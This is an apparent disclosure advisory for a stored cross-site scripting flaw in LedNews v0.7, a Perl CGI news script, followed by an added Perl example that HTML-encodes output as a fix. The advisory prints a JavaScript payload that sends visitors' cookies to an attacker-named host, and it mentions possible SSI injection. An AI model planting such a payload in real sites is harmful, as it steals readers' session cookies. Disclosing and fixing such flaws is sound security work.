XSS Vulnerability in LedNews (CGI/Perl) v0.7
URL: http://www.ledscripts.com/index.php?page=free:perl:lednews
Description
=======
LedNews is a CGI application written entirely in Perl. It's designed to be as
simple as possible, but very powerful at the same time.
Vulnerability
========
The script does not attempt to filter out JavaScript or any other HTML tags.
So posting the message:
<script>
document.location.replace('http://evil-haxor.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>
as news will send cookies to your CGI script.
P.S.:
It may also be possible to put SSI tags in news posts, since the script does
not seem to do the usual filtering for them. I did not test this because I'm
too lazy to install SSI on my system.
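
The fix for the behaviour described above, shown as an added example that is not LedNews's own code or part of the original advisory: encode every stored news field at output time, which also keeps an SSI directive from reaching the server-side parser as markup. The function names, field names and sample posts are assumptions constructed for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Characters that are significant in HTML text and attribute values.
# The substitution below is a single pass, so '&' is never escaped twice.
my %ENTITY = (
    '&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
    '"' => '&quot;', "'" => '&#39;',
);

sub escape_html {
    my ($text) = @_;
    $text = '' unless defined $text;
    $text =~ s/([&<>"'])/$ENTITY{$1}/g;
    return $text;
}

# Hypothetical "before": stored fields are interpolated into the page as-is,
# so any tag in a post becomes live markup for every reader.
sub render_post_unsafe {
    my ($post) = @_;
    return "<h3>$post->{title}</h3>\n<p>$post->{body}</p>\n";
}

# Hardened: encode each field first, then add the only markup we intend.
sub render_post {
    my ($post) = @_;
    my $title = escape_html($post->{title});
    my $body  = escape_html($post->{body});
    $body =~ s/\r?\n/<br>\n/g;    # line breaks are added after encoding
    return "<h3>$title</h3>\n<p>$body</p>\n";
}

# Constructed sample posts: a script tag and a benign SSI directive.
my @posts = (
    { title => 'Site update', body => "<script>/* script from a post */</script>" },
    { title => 'SSI check',   body => '<!--#echo var="DATE_LOCAL" -->' },
);

for my $post (@posts) {
    my $safe = render_post($post);
    # Neither a script tag nor an SSI opener may survive encoding.
    die "raw markup survived encoding\n" if $safe =~ /<script|<!--#/i;
    print "unsafe: ", render_post_unsafe($post);
    print "safe:   ", $safe;
}
```

Encoding at output rather than stripping tags at input means posts already stored by the vulnerable version are rendered safely as well.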
About me
=======
I'm gilbert from Team UEC. I'm 16 years old.
I dream about a job in security someday.
This is my first time posting a vulnerability.
I can always be contacted at [email protected]
Thank you for reading this and have a nice day,
Gilbert